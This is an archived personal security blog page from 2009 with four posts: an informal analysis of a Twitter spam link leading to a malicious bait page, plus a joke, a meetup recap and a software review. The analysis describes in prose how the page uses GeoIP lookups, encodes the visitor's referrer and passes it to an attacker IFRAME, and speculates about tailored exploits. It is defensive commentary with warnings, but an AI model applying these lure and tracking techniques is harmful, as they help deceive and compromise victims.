Tuesday 27 October 2009

Twitter, SPAM and zombie hookers

twitspim.png Came out of a blue - no context, nothing... BTW - we've got new URL shortening service.
All would be almost 'fine' but WTF is that? Not that I wouldn't guess but I'm just curious how owned you can get :-)

As a matter of fact, you can get owned pretty bad and what I've seen I would expect to be just a starter... the main course is coming soon!

WARNING: All the information provided in this post is available on the Internet. Links presented on screen shots should be considered malicious - do not visit them unless you really know what you are doing. You have been warned.

Just as your mother told you...

The best way IMHO to check stuff like that is the old school way...

Looks broken, right... redirect ok - that's what I've expected, but then... hold on - Client-Peer IP is not mine in any way... so who owns this one?

Isn't that just sweet? You go to a website and the traffic goes via proxy somewhere in China. Well - that's not all in fact. Let's grab a clean VM, make snapshot just in case, connect - let's see what a sexy girl has to offer, right?


Don't to that at work or you may get strange looks from people around (at best) ;-)

The Bait

Page loads and looks like a blog - that's what the URL would suggest, but if you look in the source... I said THE SOURCE, not the boobs on the page!

Right... in the source you find the gems. First of all the page is using GeoIP JavaScript include from Maxmind - we all know it works well - to give the reader more personalized experience when you read the story (don't even tell me you are still looking at the photos - lol). As an effect the page resolves that I connect from IP address in London and that the poor girl comes from 'a small town near London , H9' and has to work as a stripper to pay her college fees...

London, H9... hold on - London doesn't have H9 post code (although on the page it looks like it was a part of address). GeoIP information is used in several places and looks quite... convincing... as long as you focus on the boobies... oh and forget about the fact that the bottom of the page says 'She is single boys!!!! She lives in my hometown of London' - right, somebody doesn't even have a spell check :-]

The Shot

Let's look at the gems on the top shelf... I don't have a lot of time to look at it properly, so just quick bullet points:

  1. We have a JavaScript that contains two functions 'encoding' their input. Well kind of encoding because it uses ord() to do it and it seems the author is not very skilled, but anyway - he/she managed to produce working code
  2. Call to encode function with referrer URL given as parameter - why someone is trying to steal my referrer info?
  3. JavaScript print out an IFRAME linking to HTML file and passes encoded string as a parameter. The file came back empty, but GET string is left in their logs :-)
Getting the referrer string doesn't look that bad... right? Anyway, why do they want to know where am I coming from? Is that like SEO and affiliate tracking for malware? Interesting!

Post Mortem

Not much of it... As I said I don't have time to play with it properly and see if for example I actually get something from this 'empty' html file. It would be trivial to provide further payload if the victim provides properly encoded referrer string that is of attacker's interest.
How effective it would be if the bad guys used this just to check via which channel the victim came to them (they can also find out which channels are the most successful - it's just like marketing campaigns)? The next logical step would be to provide customized exploit - if victim came from Twitter do bad stuff to a Twitter user, Facebook - get them owned on Facebook, etc.

Surely the guys are learning and their intentions are not good. Keep an eye out and don't get yourself fooled!

Friday 23 October 2009

Windows 7 Haz Cheezburgerz!


Came via e-mail from one of 'marketing' guys so I don't know the real origin (except obvious one) but the sender's comment was spot on!

Look at the monster burger. It's five inches tall and of course is made with seven beef patties in honor of Windows 7. What's the message here? Eat this burger to feel as slow and bloated as Windows? I don't get it.

... and neither do I but as a poster it's a nice one for laugh. In fact Windows 7 is so much faster than Vista that there is nothing to compare ;-) so Burger King should be selling V-shaped burgers some time ago when Vista came out. Well - never mind... but thanks for this e-mail and a good laugh :-)

BTW. If there is a person that would understand what the advert is all about (and I don't mean translating the text) or can see the 'hidden message', please enlighten me :-)

Thursday 22 October 2009

RSA Security Bloggers Meet Up 2009 London

It's already a matter of past but still - the first official RSA Security Bloggers Meet Up 2009 in London was held in Fountains Abbey at 19:30 on 20 October 2009. It was a great evening - meeting people that live and share every bit of security related information they can - to educate and entertain :-)

I just want to say thank you to Dale Pearson of Security Active for getting all of it prepared and to all the sponsors - IronKey, ISACA, Qualys, RSA and others - for helping Dale and sponsoring the meet up. Dale has posted a summary and photos from the meet up at Security Active's blog. If I've missed anybody in above, please forgive me.

For me this meeting was a chance to see some people I've already met earlier (like @stefant and several others) and some I was trying to almost 'hunt down' in London for quite some time (@xme is perfect example here) so for me the meet up was a real success :-)

Thanks again and see you all next time!

Saturday 17 October 2009

UI mockups - nice and easy

I write code. Sometimes it will be a short script, sometimes a web app, next day it can be something with more
traditional user interface but designing user interfaces is my worst nightmare. I can plan the whole app, write and test the code, but when it comes to UI design I just want to run away - it is simply not my game.

Usually when everything is
finally ready (or so I think) somebody comes and says 'Oh! By the way - if you moved this part here, it would be better - easier to use' and quite often they
are right, so I've started asking my potential users how they want it done before I actually create it at all, but for that I need simple drawings that would explain my idea - something they can look at and say if they like it or not. Preparing several sketches takes time, modifying them takes even more... but there is a tool that helps.

A humble screen shot is worth more than a thousand words...

As simple as that - prototype of simple blog layout in less than 10 minutes using Balsamiq Mockups for Desktop (demo version). Simple, nice to use, very effective!

Normally I wouldn't write about 'software' (especially commercial), but there is something special about this one....

First of all the main use of this program is to do mockups of user interfaces - be it web apps (which for me is yet another form of UI), iPhone apps, dialog windows or anything else. Sometimes all you really need is simple wire frame to show what will be where - rough cut to present the idea - and using pen and paper is simply too... boring and ineffective, especially when you want to discuss your ideas, then possibly change it a bit and discuss again. Here comes in Balsamiq Mockups for Desktop.

Mockups for Desktop runs as Adobe Air application so it's cross-platform. The interface is very intuitive and easy to work with, so you can't get it wrong. You can get first mockups ready literally in minutes after you start the application for the first time ever - modeling my other blog layout idea took me just 3 minutes. It is very simple - just drag the element from the UI library to the main drawing area and put it in the right place. Editing objects comes as natural thing - I guess even a child could do it :-)

I won't be telling you how to use it - go figure it out yourself and have fun as I did :-) Wow! I think that was the first time ever I had a smile on my face when trying to work on the user interface side of things. I think it's a really good piece of software and honest 'well done' to the guys at Balsamiq.

BTW. Irek, thanks for bringing it to my attention ;-)